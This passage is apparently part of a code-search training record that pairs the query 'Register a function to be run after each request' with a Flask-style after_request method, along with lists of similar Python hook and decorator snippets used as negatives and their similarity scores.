`is_audit_enabled` depends on\n # the config being loaded\n flask.after_this_request(create_audit_log_for_request_decorator)\n return f(*args, **kwargs)\n\n return wrapper", "def inner(func):\r\n\r\n service = func.__qualname__.split(\".\")[0]\r\n _Router().add_route(\r\n service=service,\r\n grpc_method=func.__name__,\r\n url_path=url,\r\n http_method=method\r\n )\r\n if pre_request is not None and len(pre_request) > 0:\r\n 
_MiddlewareManager().add_route_pre_middleware(pre_request, url)\r\n if pos_request is not None and len(pos_request) > 0:\r\n _MiddlewareManager().add_route_pre_middleware(pos_request, url)\r\n return func", "def register(func):\n plugins[func.__name__] = func\n return func", "def register_function(self, function, name=None):\n if name:\n self[name] = function\n else:\n self[function.__name__] = function", "def register(self, function, name=None, method='POST'):\r\n\r\n method = self.clean_method(method)\r\n\r\n # Generate a default name\r\n if not name:\r\n module = ''.join(str(function.__module__).rsplit('.ajax', 1))\r\n name = '.'.join((module, function.__name__))\r\n\r\n if ':' in name:\r\n log.error('Ivalid function name %s.' % name)\r\n return\r\n\r\n # Check for already registered functions\r\n if name in self._registry:\r\n log.error('%s was already registered.' % name)\r\n return\r\n\r\n # Create the dajaxice function.\r\n function = DajaxiceFunction(function=function,\r\n name=name,\r\n method=method)\r\n\r\n # Register this new ajax function\r\n self._registry[name] = function", "def onRequestStart(self, api, request):\n logging.info('Request start ({})'.format(request))", "def do_before(self):\r\n pass", "def add_hook(self, type_: str, hook: typing.Callable) -> typing.Callable:\n if type_ not in self._request_hooks:\n self._request_hooks[type_] = []\n\n self._request_hooks[type_].append(hook)\n return hook", "def pre_runroute_callable(self, route, request):\n\n #request.logevent(EInfo(\"pre_runroute_callable Request URL: {0} from {1}.\".format(request.get_full_path(), request.get_remote_addr())))\n # ATTN: test, let's trigger a signal\n if (False):\n id = 'signal.site.pre_runroute'\n message = {'route':route}\n source = None\n flag_collectresults = True\n signalresults = self.comp('signalmanager').broadcast(id, message, request, source, flag_collectresults)\n return None", "def getFunctionBefore(self, function: ghidra.program.model.listing.Function) -> ghidra.program.model.listing.Function:\n ...", "def register_requests(fn):\n @wraps(fn)\n def inner(self, *args, **kwargs):\n if not self._was_setup_called:\n self.dm_setup()\n\n response = self._get_response(args, kwargs)\n response_id = self._get_response_id(response)\n response.meta['__id'] = response_id\n\n result = fn(self, *args, **kwargs)\n if not result:\n return\n\n # Save original type to return the same results from ``fn``\n original_type = type(result)\n\n if isinstance(result, Request):\n result = [result]\n\n request_list = []\n for r in result:\n if isinstance(r, Request):\n r = self._add_identifiers_to_request(r, response_id)\n self._increase_counter(response)\n\n request_list.append(r)\n\n if original_type in (list, types.GeneratorType):\n return request_list\n else:\n return request_list[0]\n\n return inner", "def register(self, filter_name, filter_func):\n self._filters[filter_name] = filter_func", "def add_function (self, module, name) :\n setattr (module, name, self._wrapped (module, name))", "def wrap_before(before, condition=lambda *args, **kwargs: True):\n def decorator(func):\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n if condition(*args, **kwargs):\n before()\n return func(*args, **kwargs)\n return wrapped\n return decorator", "def post_init_func(fn):\n fn.__has_run__ = False\n @functools.wraps(fn)\n def wrapper_fn(*args, **kwargs):\n if fn.__has_run__:\n cui.message('Warning: executing post_init_func %s more than once.' 
% fn)\n\n result = fn(*args, **kwargs)\n fn.__has_run__ = True\n return result\n\n Core.__post_init_functions__.append(wrapper_fn)\n return wrapper_fn", "def add_hook(self, event, function):\n if event not in self.hooks:\n self.hooks[event] = []\n self.hooks[event].append(function)", "def on_before_execution(self):\n pass", "def register_compat_handler(self, func, version):\n tf_op.register_handler(func, version, self.names, self.domain, self.kwargs)", "def set_function(self, function, guard):\r\n self.function = function\r\n self.guard = guard", "def process_request_starts(self, request):\n pass", "def register_side_effect(label: str, func: Callable) -> None:\n if func in _registry[label]:\n return\n _registry.add(label, func)", "def before(self, context):\n raise NotImplementedError", "def register(name, fn=None):\n def _hook_add(func):\n if name not in _hooks:\n logger.debug(\"Creating new hook %s\" % name)\n _hooks[name] = []\n\n logger.debug('Registering hook %s for function %s' % (name, fn))\n _hooks[name].append(func)\n\n if fn is None:\n # Behave like a decorator\n def decorator(func):\n _hook_add(func)\n return func\n return decorator\n else:\n # Behave like a function, just register hook\n _hook_add(fn)", "def decorate(func):\n from aha.dispatch.router import get_router\n r = get_router()\n r.connect(None, path, controller = func, **params)\n return func", "def register(self):\n # self.register_route(\"GET\", self.__route, lambda req, res: self.status(req, res))\n self.register_route(\"GET\", self.__route, None, self.status)", "def enqueue(self, func):\n self.queue.put(func)", "def hook(callback):\n hooks.append(callback)", "def require_thread():\n def add_attribute(func):\n if not hasattr(func, \"require_thread\"):\n func.require_thread = True\n return func\n return add_attribute", "def register_side_effect(label, func):\n if func in _registry[label]:\n return\n _registry.add(label, func)", "def on_lz_registered(self, func):\n self._set_event_handler(\"lz\")\n self._events.on_lz_registered(func)", "def before_invoke(self, coro):\n if not asyncio.iscoroutinefunction(coro):\n raise TypeError('The pre-invoke hook must be a coroutine.')\n\n self._before_invoke = coro\n return coro", "def run_before(self):\n\n for path in self.hooks.get('before', []):\n self.run_module(path)", "def hook(self, name):\r\n def wrapper(func):\r\n self.hooks.add(name, func)\r\n return func\r\n return wrapper", "def required(self, f):\n self.storage.protected_routes.add(f)\n return f", "def add_setup(setup=None, teardown=None):\n def decorate_function(test):\n def wrapper(self):\n if setup:\n setup(self)\n test(self)\n if teardown:\n teardown(self)\n return wrapper\n return decorate_function" ]
[ "0.8118946", "0.7769813", "0.69504994", "0.67644304", "0.6689539", "0.65856653", "0.65145713", "0.64500964", "0.6426918", "0.6376406", "0.6375528", "0.63239646", "0.6193873", "0.6136782", "0.59849536", "0.5943737", "0.58747", "0.5869897", "0.5857567", "0.58538926", "0.5827149", "0.5812418", "0.5764284", "0.57346094", "0.56955945", "0.5689887", "0.5689887", "0.56871367", "0.5681491", "0.56393886", "0.5630879", "0.5606987", "0.5598525", "0.5582452", "0.5580899", "0.5568795", "0.55475056", "0.5545752", "0.5533788", "0.55304956", "0.55259424", "0.5525647", "0.55176395", "0.54891765", "0.54871273", "0.5474354", "0.5464785", "0.54279727", "0.542249", "0.54162854", "0.54162854", "0.5413079", "0.53874", "0.5375212", "0.5352849", "0.53461033", "0.53450376", "0.53423715", "0.5341481", "0.5331866", "0.53313977", "0.5321571", "0.53215396", "0.5309453", "0.5307446", "0.52655625", "0.5265226", "0.5260859", "0.5259816", "0.52433056", "0.5241257", "0.5234663", "0.52261424", "0.52149427", "0.52112114", "0.52050775", "0.5200987", "0.51938635", "0.51818615", "0.5179914", "0.51508653", "0.51451015", "0.5141118", "0.51362705", "0.5133384", "0.5130427", "0.51262325", "0.5117145", "0.5114524", "0.51108015", "0.5108582", "0.51010007", "0.5099876", "0.50956213", "0.50785774", "0.5070053", "0.50683755", "0.50679797", "0.50671554", "0.5062091" ]
0.81964976
0
Register a function to be run after each request.
def after_request(self, f):
        self.after_request_funcs.append(f)
        return f
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def after_request_handle(self, func):\n self.after_request.append(func)\n return func", "def after_request(self, f):\n self.after_request_handlers.append(f)\n return f", "def after_request(self, f):\n self.after_request_handlers.append(f)\n return f", "def after_request(self, func: typing.Callable):\n return self.add_hook(type_=\"post\", hook=func)", "def after_worker_start(func):\n _func_only(func)\n worker_methods_db.register_after_start(func)\n return func", "def before_request(self, f):\n self.before_request_funcs.append(f)\n return f", "def middleware_after(self):\n pass", "def after_error_request(self, f):\n self.after_error_request_handlers.append(f)\n return f", "def register_method_after(fn, phase): # type: (Callable, str) -> None\n PackageMixinsMeta._methods_to_be_added[fn.__name__] = fn\n PackageMixinsMeta._add_method_after[phase].append(fn)", "def post(self):\n self.finish(self.register())", "def bofore_response_handle(self, func):\n self.before_response.append(func)\n return func", "def register(self):\n REGISTERED_FUNCTIONS[self.path] = self", "def register_ajax_handler(self, request, function):\n if request in self.ajax_handlers:\n L.error(\"Error: request:\" + request + \" is already registered\")\n return False\n self.ajax_handlers[request] = function\n L.info(\"registered:\"+request)\n return True", "def before_request(self, f):\n self.before_request_handlers.append(f)\n return f", "def threaded_callback(self, func):\n\n self.th_func_map[func.__name__] = func", "def addHandler(self, fn):\n self.handlers.append(fn)", "def Postcall(function_to_call_later): \n def postcall_inside(fun): \n @functools.wraps(fun)\n def relay(*args, **kwargs):\n return function_to_call_later(fun(*args, **kwargs))\n return relay\n return postcall_inside", "def register_callback(self, func):\n self.callback = func", "def after_test(self, func, *args, **kwargs):\n pass", "def register(name, func):\n WebSocketRouter.funcmap[name] = func", "def register(self):\n # self.register_route(\"GET\", self.__route, lambda req, res: self.status(req, res))\n self.register_route(\"GET\", self.__route, None, self.status)", "def register(self, funcs):\n for name, func in funcs.items():\n self.functions[name] = func", "def onfinish( request ):", "def onfinish( request ):", "def process_after_request_hooks(self, resp):\n\n hooks = []\n meth_hooks = getattr(\n self,\n 'after_{method}_hooks'.format(method=self.meth),\n []\n )\n\n hooks.extend(meth_hooks)\n hooks.extend(self.after_all_hooks)\n\n if self.resource:\n hooks.extend(self.resource.after_all_hooks)\n hooks.extend(self.resource.api.after_all_hooks)\n\n for hook in chain(hooks):\n resp = hook(self, resp)\n\n return resp", "def after(self, after: Route.Decorator):\n pass", "def before_request(self, func: typing.Callable):\n return self.add_hook(type_=\"pre\", hook=func)", "def addFunction(self, func):\n self.__functions.append(func)", "def onRegister(self):\n pass", "def onRegister(self):\n pass", "def request_filter(self, fn):\n self.request_filters.append(fn)\n return fn", "def hook_server_after_exec(self, request_event, reply_event):\r\n for functor in self._hooks['server_after_exec']:\r\n functor(request_event, reply_event)", "def register_request_hooks(app):\n\n @app.before_request\n def before_request():\n g.db = open_db()\n\n @app.teardown_request\n def after_request(exc):\n g.db.__exit__(type(exc), exc, None)", "def register(self, callback):\n self.callback = callback", "def register(self, callback, func = None):\n if self.conduit is None:\n 
self.conduit = RPCConnection(self.host, self.port)\n self.conduit.comm(dict(command = 'app-key', key = self.rpckey))\n self.events = deque()\n self.responses = deque()\n self.errors = deque()\n self.callbacks = defaultdict(set)\n self.receiver(start = True)\n if callback in self.callbacks:\n self.callbacks[callback].add(func)\n return\n # Accessing here just initializes an empty set. This prevents\n # multiple redundant calls from re-sending the callback-add, which\n # RPM reports an error to because the callback is already defined.\n if func is not None:\n self.callbacks[callback].add(func)\n else:\n self.callbacks[callback]\n self.conduit.send(dict(command = 'callback-add', callback = callback))", "def post_event(self, func, *args, **kwargs):\n if not callable(func):\n assert(len(func) == 5)\n self._events.append(func + (log.get_tb(1), time.time()))\n else:\n self._events.append((func, args, kwargs, None, 0, log.get_tb(), time.time()))", "def after(self, func):\n return ConditionedFuture(func, self)", "def on_lz_registered(self, func):\n self._set_event_handler(\"lz\")\n self._events.on_lz_registered(func)", "def on_completion(self):\n\n def decorator(coro):\n self._hooks.append((\"completion\", coro))\n return coro\n\n return decorator", "def add_function(self, function):\n self.functions.append(function)", "def add_function(self, function):\n self.functions.append(function)", "def subscribe(self, requestName: str, function: RequestFunction):\n if requestName in self.requests:\n raise KeyError(f\"Cannot subscribe function {function} to name {requestName} because \"\n f\"the name is already used\")\n self.requests[requestName] = function", "def dajaxice_register(*dargs, **dkwargs):\r\n\r\n if len(dargs) and not dkwargs:\r\n function = dargs[0]\r\n dajaxice_functions.register(function)\r\n return function\r\n\r\n def decorator(function):\r\n @functools.wraps(function)\r\n def wrapper(request, *args, **kwargs):\r\n return function(request, *args, **kwargs)\r\n dajaxice_functions.register(function, *dargs, **dkwargs)\r\n return wrapper\r\n return decorator", "def add_done_callback(self, fn):\n if self.done():\n # self._loop.call_soon(fn,self)\n call_soon(fn, self)\n else:\n self._callbacks.append(fn)", "def add_default_done_callback(self, fn):\n\n self._default_done_callbacks.append(fn)", "def register(self, function, name=None, method='POST'):\r\n\r\n method = self.clean_method(method)\r\n\r\n # Generate a default name\r\n if not name:\r\n module = ''.join(str(function.__module__).rsplit('.ajax', 1))\r\n name = '.'.join((module, function.__name__))\r\n\r\n if ':' in name:\r\n log.error('Ivalid function name %s.' % name)\r\n return\r\n\r\n # Check for already registered functions\r\n if name in self._registry:\r\n log.error('%s was already registered.' 
% name)\r\n return\r\n\r\n # Create the dajaxice function.\r\n function = DajaxiceFunction(function=function,\r\n name=name,\r\n method=method)\r\n\r\n # Register this new ajax function\r\n self._registry[name] = function", "def register_func_list(self, func_and_handler):\n for func, handler in func_and_handler:\n self._function_dispatch.register(func, handler)\n self.dispatch.cache_clear()", "def rpc_deferred(func):\n decorator = rpc_call(func)\n decorator.rpc_deferred = True\n return decorator", "def register_handler(self, method, path, fn):\n if not(method in self.handlers):\n self.handlers[method] = {}\n self.handlers[method][path] = fn", "def register_callback(self, callback):\n self.callbacks.add(callback)", "def add(self, method: str, pattern: str, handler: Callable) -> None:", "def register_to_event(request):\n pass", "def register_step(step_function: StepFunction) -> None:\n global _step_function\n _step_function = step_function", "def on_exit(self, function):\n\t\tself.exit_functions += [function]", "def hook(callback):\n hooks.append(callback)", "def add_done_callback(self, fn):\n if self.done():\n fn(self)\n else:\n self._callbacks.append(fn)", "def register_prometheus(app: Flask, registry=REGISTRY) -> None:\n\n def after(response: Response) -> Response:\n endpoint = _get_endpoint()\n status_code = _get_status_code(response)\n\n # TODO (1): count the number of calls by Flask endpoint and status_code\n\n return response\n\n def _get_endpoint() -> Optional[str]:\n \"\"\"\n Extracts the endpoint from a Flask request.\n :return: Flask endpoint.\n \"\"\"\n if request.endpoint is None:\n return None\n return request.endpoint.split(\".\")[-1]\n\n def _get_status_code(response: Response) -> int:\n \"\"\"\n Extracts the HTTP status code from a Flask response.\n :param response: Flask response.\n :return: HTTP status code.\n \"\"\"\n status_code = response.status_code\n if isinstance(status_code, HTTPStatus):\n return status_code.value\n else:\n return status_code\n\n # Flask will execute the `after` function after serving each request\n app.after_request(after)", "def on_register(self, response):\n print('You have been registered!')\n self.on_auth(response)", "def onRegister(setup_state):\n\tblueprint = setup_state.blueprint\n\t#if setup_state.options.get('auth') == True:\n\tif setup_state.url_prefix.startswith('/ext/'): #not really used right now\n\t\t#inside here, 'route' works but not 'before_request'\n\t\t#maybe use to register authentication-specific routes?\n\t\tprint(\"Authenticated API on {}\".format(setup_state.url_prefix))", "def post_init_func(fn):\n fn.__has_run__ = False\n @functools.wraps(fn)\n def wrapper_fn(*args, **kwargs):\n if fn.__has_run__:\n cui.message('Warning: executing post_init_func %s more than once.' 
% fn)\n\n result = fn(*args, **kwargs)\n fn.__has_run__ = True\n return result\n\n Core.__post_init_functions__.append(wrapper_fn)\n return wrapper_fn", "def on_shutdown(self):\n\n def decorator(coro):\n self._hooks.append((\"shutdown\", coro))\n return coro\n\n return decorator", "def register_callback(self):\n raise Exception('not implemented')", "def register_post_exec_callback(action_logger):\n logging.debug(\"Adding %s to post execution callback\", action_logger)\n __post_exec_callbacks.append(action_logger)", "def on_register(cls):", "def register_callback(self, callback: Callable[[], None]) -> None:\r\n print(\"register callback called\")\r\n self._callbacks.add(callback)", "def registerHTTPPostCallbacks():\n libxml2mod.xmlRegisterHTTPPostCallbacks()", "def register_function(self, function, name=None):\n if name:\n self[name] = function\n else:\n self[function.__name__] = function", "def register_function(self, function, name=None):\n if name is None:\n name = function.__name__\n self.funcs[name] = function", "def post_runroute_callable(self, request):\n return None", "def multiprocess_callback(self, func):\n\n self.mul_func_map[func.__name__] = func", "def on_loaded(self, func):\n self._on_loaded_funcs.append(func)", "def append_function(self, extra_function):\n assert extra_function.name != self.name, \\\n 'Name of the remote function should be different'\n for func in self.appended_functions:\n assert extra_function.name != func.name, \\\n 'Cannot append functions with the same name'\n self.appended_functions.append(extra_function)", "def register_handler(self, method, handler):\n self.handlers[method] = handler", "def after_worker_stop(func):\n _func_only(func)\n worker_methods_db.register_after_stop(func)\n return func", "def after_request(response):\n request_latency = time.time() - request._prometheus_metrics_request_start_time\n METRICS_REQUEST_LATENCY.labels(request.method, request.path).observe(\n request_latency\n )\n METRICS_REQUEST_COUNT.labels(\n request.method, request.path, response.status_code\n ).inc()\n return response", "def register():\n PLUGINS = dict()\n def decorator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n value = func(*args, **kwargs)\n PLUGINS[func.__name__] = func\n return value\n return wrapper\n return decorator", "def observe(self, fn):\n self.observers.append(fn)\n return fn", "def hook_server_before_exec(self, request_event):\r\n\r\n for functor in self._hooks['server_before_exec']:\r\n functor(request_event)", "def after_request(response):\n # TODO: Send log reports to a monitor service such as DataDog?\n return response", "def register( self, pattern, callback ):\n self.patterns.append((pattern, callback))", "def register(cls, claim_func):\n def _deco(serializer):\n cls._registered.insert(0, (claim_func, serializer))\n return serializer\n return _deco", "def register_callback(self, callback):\n self._callbacks.append(callback)", "def register_async_callback(self, async_callback):\n self._async_callbacks.append(async_callback)", "def register(self, callback, filters = []):\n\t\tself.callbacks.append((callback, filters))\n\t\tself.events[str(callback)] = []", "def hook_client_after_request(self, request_event, reply_event, exception=None):\r\n for functor in self._hooks['client_after_request']:\r\n functor(request_event, reply_event, exception)", "def register_callback(func): \n \n VoiceService.add_callback(func.__name__, func) \n\n return func", "def restipy(callback,\n pre_call=lambda env,sr,args,kwargs: None,\n 
post_call=lambda env,sr,call_ret: None):\n _func_table[callback.__name__] = (callback, pre_call, post_call)", "def async_register_scan_request_callback(\n self,\n _callback: CALLBACK_TYPE,\n ) -> CALLBACK_TYPE:\n self._request_callbacks.append(_callback)\n\n @hass_callback\n def _async_remove_callback() -> None:\n self._request_callbacks.remove(_callback)\n\n return _async_remove_callback", "def decorator(fn):\n @functools.wraps(fn)\n def result(*args, **kwargs):\n request_time = datetime.datetime.now()\n actual_response = fn(*args, **kwargs)\n request = bottle.request\n response = bottle.response\n # modify this to log exactly what you need:\n logger.info('%s %s %s %s %s', request.remote_addr,\n request_time,\n request.method,\n request.url,\n response.status)\n logger.info('Cookies: %s', request.get_cookie('login'))\n logger.info('Handeled by: \"%s\" in file: \"%s\"', fn.__name__, SCRIPT_NAME)\n\n return actual_response\n return result", "def register(self, event_name, callback_func, priority=50, identifier=None,\n method=EVENT_BUBBLE):\n if event_name in self.events:\n self.events[event_name].add(callback_func, priority, identifier,\n method)\n else:\n self.events[event_name] = HandlerList(callback_func, priority,\n identifier, method)", "def after_get_hook(self):\n pass", "def register_route(app):\n\n @app.teardown_appcontext\n def teardown_session(e):\n \"\"\"\n Exit the context of my_db and OT_spider when app's context is teared down.\n :param e: event.\n :return: None.\n \"\"\"\n my_db.close()\n OT_spider.close()\n\n @app.errorhandler(404)\n def page_not_found(e):\n \"\"\"\n Render assigned template when error code 404 occurs.\n :param e: error event.\n :return: error/404.html.\n \"\"\"\n return render_template(\"error/404.html\"), 404\n\n @app.errorhandler(403)\n def access_forbidden(e):\n \"\"\"\n Render assigned template when error code 403 occurs.\n :param e: error event.\n :return: error/403.html.\n \"\"\"\n return render_template(\"error/403.html\"), 403\n\n @app.errorhandler(500)\n def internal_server_error(e):\n \"\"\"\n Render assigned template when error code 500 occurs.\n :param e: error event.\n :return: error/500.html.\n \"\"\"\n return render_template(\"error/500.html\"), 500\n\n @app.before_request\n def filter_request():\n \"\"\"\n Intercept requests with disallowed methods and/or fake user agent.\n :return: None.\n \"\"\"\n if request.method not in ALLOWED_METHODS:\n return \"Method Not Allowed\", 405\n ua = str(request.user_agent)\n if \"Mozilla\" not in ua or \"Gecko\" not in ua:\n return \"No Scrappers!\", 403\n\n @app.after_request\n def set_res_headers(response):\n \"\"\"\n Set headers to all responses.\n :param response: flask.wrappers.Response object.\n :return: response to send back to client.\n \"\"\"\n response.headers[\"Server\"] = \"OurTieba\"\n response.headers[\"X-Content-Type-Options\"] = \"nosniff\"\n response.headers[\"X-Frame-Options\"] = \"sameorigin\"\n if app.config.get(\"ENABLE_CSP\"):\n response.headers[\"Content-Security-Policy\"] = \"script-src \" + \" \".join(WHITELIST) + \"; object-src 'self'\"\n return response\n\n @app.template_filter(\"index_format\")\n def add_zeros(i, length): # format index in photos.html\n \"\"\"\n Pad zeros to i, and turn it into a string. The length is at least 2. Used in photos.html.\n :param i: int. Integer to pad.\n :param length: int. 
Base integer.\n :return: A padded string.\n\n For example,\n add_zeros(1, 2) -> \"01\";\n add_zeros(1, 12) -> \"01\";\n add_zeros(13, 101) -> \"013\".\n \"\"\"\n return (\"{:0>\" + str(max(len(str(length)), 2)) + \"d}\").format(i)", "def add_callback(self, fn):\n self._callbacks.append(fn)\n return self", "def add_handler(handler_list, handler_function):\n if not handler_function in handler_list:\n handler_list.append(handler_function)", "def add_close_handler(self, func):\n if func not in self._close_handlers:\n self._close_handlers.append(func)", "def global_response_interceptor(self):\n # type: () -> Callable\n def wrapper(process_func):\n if not callable(process_func):\n raise SkillBuilderException(\n \"Global Response Interceptor process_func input \"\n \"parameter should be callable\")\n\n class_attributes = {\n \"process\": (\n lambda self, handler_input, response: process_func(\n handler_input, response))\n }\n\n response_interceptor = type(\n \"ResponseInterceptor{}\".format(\n process_func.__name__.title().replace(\"_\", \"\")),\n (AbstractResponseInterceptor,), class_attributes)\n\n self.add_global_response_interceptor(\n response_interceptor=response_interceptor())\n return process_func\n return wrapper", "def register(target: str, response_callback: Callable[[str, str],\n Optional[str]],\n status_callback: Optional[Callable[[int, str], None]] = None,\n xml_encoding: str = \"UTF-8\") -> None:\n ...", "def callback(self):\n try:\n function()\n finally:\n main_loop.remove_handler(handler[0])", "def register( key, obj ):\n global callbacks\n callbacks[ key ] = obj", "def do_after(self):\r\n pass" ]
[ "0.7849521", "0.7643819", "0.7643819", "0.75291634", "0.62461793", "0.618368", "0.61611503", "0.61363375", "0.6126715", "0.61173093", "0.6038293", "0.5960427", "0.5939071", "0.5817307", "0.57547176", "0.57469493", "0.57465345", "0.573892", "0.56387985", "0.5626159", "0.56247324", "0.55933654", "0.5586124", "0.5586124", "0.5585159", "0.5543857", "0.55187714", "0.5512837", "0.5504014", "0.5504014", "0.5499303", "0.5495606", "0.5480781", "0.5472376", "0.5456569", "0.54551446", "0.5454601", "0.54316705", "0.542411", "0.5410469", "0.5410469", "0.54050696", "0.53801686", "0.53775203", "0.53754723", "0.5374642", "0.53654814", "0.5343876", "0.5328724", "0.5325684", "0.5316061", "0.5314407", "0.53132135", "0.5290579", "0.52817804", "0.5281538", "0.528061", "0.52771395", "0.5276198", "0.527508", "0.5252302", "0.52437794", "0.5233006", "0.5229276", "0.5220394", "0.52148765", "0.52094555", "0.5208067", "0.5207617", "0.52042335", "0.5203948", "0.5194774", "0.51917034", "0.5190002", "0.51681215", "0.5163194", "0.5161892", "0.515913", "0.51523817", "0.51460755", "0.5144199", "0.5138099", "0.51328814", "0.5128381", "0.5125532", "0.51215416", "0.51143086", "0.5106884", "0.51010907", "0.508884", "0.5088234", "0.50834584", "0.50709194", "0.50690526", "0.50674903", "0.50604767", "0.50604004", "0.50548875", "0.5054521", "0.5052002" ]
0.79526246
0
Registers a template context processor function.
def context_processor(self, f):
        self.template_context_processors.append(f)
        return f
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def register(self):\n REGISTERED_FUNCTIONS[self.path] = self", "def test_enable_extension_registers_context_processors(self):\n class TestExtension(Extension):\n context_processors = ['my_custom_processor']\n\n # Back up the list, so we can replace it later.\n if hasattr(settings, 'TEMPLATES'):\n orig_context_processors_list = \\\n list(settings.TEMPLATES[0]['OPTIONS']['context_processors'])\n else:\n orig_context_processors_list = \\\n list(settings.TEMPLATE_CONTEXT_PROCESSORS)\n\n # Sanity-check that the context processor didn't wind up in here.\n self.assertNotIn('my_custom_processor', orig_context_processors_list)\n\n try:\n extension = self.setup_extension(TestExtension)\n\n # We have to re-fetch these lists now, since they may have\n # been normalized to lists.\n if hasattr(settings, 'TEMPLATES'):\n context_processors_list = \\\n settings.TEMPLATES[0]['OPTIONS']['context_processors']\n else:\n context_processors_list = \\\n settings.TEMPLATE_CONTEXT_PROCESSORS\n\n # This should have been added, since the extension was enabled.\n self.assertIn('my_custom_processor', context_processors_list)\n\n # Shutting down the extension should remove the context\n # processor.\n self.manager.disable_extension(extension.id)\n self.assertNotIn('my_custom_processor',\n context_processors_list)\n finally:\n if hasattr(settings, 'TEMPLATES'):\n settings.TEMPLATES[0]['OPTIONS']['context_processors'] = \\\n orig_context_processors_list\n else:\n settings.TEMPLATE_CONTEXT_PROCESSORS = \\\n orig_context_processors_list", "def register():\n PLUGINS = dict()\n def decorator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n value = func(*args, **kwargs)\n PLUGINS[func.__name__] = func\n return value\n return wrapper\n return decorator", "def make_processor(cls, fnc):\n #def wrapper(**kw):\n # name = fnc.__name__\n # fnc.__name__ = 'run'\n # return type()\n # pass", "def register_template_renderer(\n self, plugin, template_name, context=default_context\n ):\n self._renderers[plugin] = (template_name, context)", "def context_processors(self):\n return [\n 'leonardo.module.web.processors.page.add_page_if_missing',\n 'leonardo.module.web.processors.config.leonardo',\n 'leonardo.module.web.processors.font.webfont_cookie',\n ]", "def register(func):\n PLUGINS[func.__name__] = func\n return func", "def add_processor(self, termprocessor):\n self.pipeline.append(termprocessor)", "def register(self, prim, fn):\n assert prim not in self.mapping\n self.mapping[prim] = fn", "def add_macro_context(self, name: str, context: dict = None):\r\n if context is None:\r\n context = dict()\r\n self.macros[name].add_instance(dict())", "def register(prim):\n def deco(fn):\n vm_register(prim)(lambda vm, *args: fn(*args))\n return py_register(prim)(fn)\n return deco", "def register(func):\n plugins[func.__name__] = func\n return func", "def register():\n \n global _registered\n if not _registered:\n _registered = True\n sys.path_hooks.insert(0, VFSImporter)", "def get_render_fn(self):\n def render(environment, ctxt_data, file_path):\n \"Renders a jinja2 template\"\n logging.debug(\"Rendering with context data %s\", ctxt_data)\n\n template = environment.get_template(file_path)\n return template.render(**ctxt_data)\n return render", "def add_preprocess_callback(self, name, func, *args, **kwargs):\n\n self.preprocess[name] = (func, args, kwargs)", "def template_extra_functions(self):\n\t\treturn []", "def render_template():\n template_engine = engines['django']\n def func(template_string):\n load_tags_string = '{% 
load wagtailextensions_tags %}'\n return template_engine.from_string(load_tags_string + template_string).render()\n return func", "def process(f: ProcessFunction) -> ProcessFunction:\n process_registry_040.add_function(f)\n process_registry_100.add_function(f)\n return f", "def template_function2(self, node, ordered_functions):\n new = node.clone()\n ordered_functions.append(new)\n self.append_function_index(new)\n\n new._generated = \"cxx_template\"\n\n new.cxx_template = {}\n # fmt.CXX_template = targs.instantiation # ex. <int>\n\n # self.push_instantiate_scope(new, targs)\n\n if new.ast.template_argument:\n iast = getattr(self.instantiate_scope, new.ast.template_argument)\n new.ast = new.ast.instantiate(node.ast.instantiate(iast))\n # Generics cannot differentiate on return type\n new.options.F_create_generic = False\n\n # Replace templated arguments.\n newparams = []\n for arg in new.ast.declarator.params:\n if arg.template_argument:\n iast = getattr(self.instantiate_scope, arg.template_argument)\n newparams.append(arg.instantiate(iast))\n else:\n newparams.append(arg)\n new.ast.declarator.params = newparams\n # self.pop_instantiate_scope()\n\n # Do not process templated node, instead process\n # generated functions above.\n node.wrap.clear()", "def render_inclusion(func, file_name, takes_context, django_context, *args, **kwargs):\r\n\r\n if takes_context:\r\n args = [django_context] + list(args)\r\n\r\n _dict = func(*args, **kwargs)\r\n if isinstance(file_name, Template):\r\n t = file_name\r\n elif not isinstance(file_name, basestring) and is_iterable(file_name):\r\n t = select_template(file_name)\r\n else:\r\n t = get_template(file_name)\r\n\r\n nodelist = t.nodelist\r\n\r\n new_context = Context(_dict)\r\n csrf_token = django_context.get('csrf_token', None)\r\n if csrf_token is not None:\r\n new_context['csrf_token'] = csrf_token\r\n\r\n return nodelist.render(new_context)", "def register_function(self, function, name=None):\n if name:\n self[name] = function\n else:\n self[function.__name__] = function", "def register_shellcontext(app):\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n 'db': db,\n 'Person': person,\n 'Movie': movie,\n 'Actors': actors,\n 'Writers': writers,\n 'Directors': directors,\n 'Genres': genres\n }\n\n app.shell_context_processor(shell_context)", "def register_entrypoints(self):\n for entrypoint in entrypoints.get_group_all(\"mlflow.run_context_provider\"):\n try:\n self.register(entrypoint.load())\n except (AttributeError, ImportError) as exc:\n warnings.warn(\n 'Failure attempting to register context provider \"{}\": {}'.format(\n entrypoint.name, str(exc)\n ),\n stacklevel=2\n )", "def Map(context, funcname, *nodesets):\n (prefix, local) = ExpandQName(funcname, namespaces=context.processorNss)\n func = (g_extFunctions.get(expanded) or\n CoreFunctions.CoreFunctions.get(expanded, None))\n if not func:\n raise Exception('Dynamically invoked function %s not found.'%funcname)\n flist = [f]*len(nodesets)\n lf = lambda x, f, *args: apply(f, args)\n retlist = apply(map, (lf, flist) + nodesets)\n\n proc = context.processor\n result_nodeset = []\n for ret in retlist:\n proc.pushResult()\n proc.writers[-1].text(Conversions.StringValue(ret))\n frag = proc.popResult()\n context.rtfs.append(frag)\n result_nodeset.append(frag.childNodes[0])\n return result_nodeset", "def env_reg_deco(func):\n envelopes[str(func.__name__)] = func\n return func", "def register_render_tag(renderer):\n def tag(parser, token):\n class TagNode(template.Node):\n def 
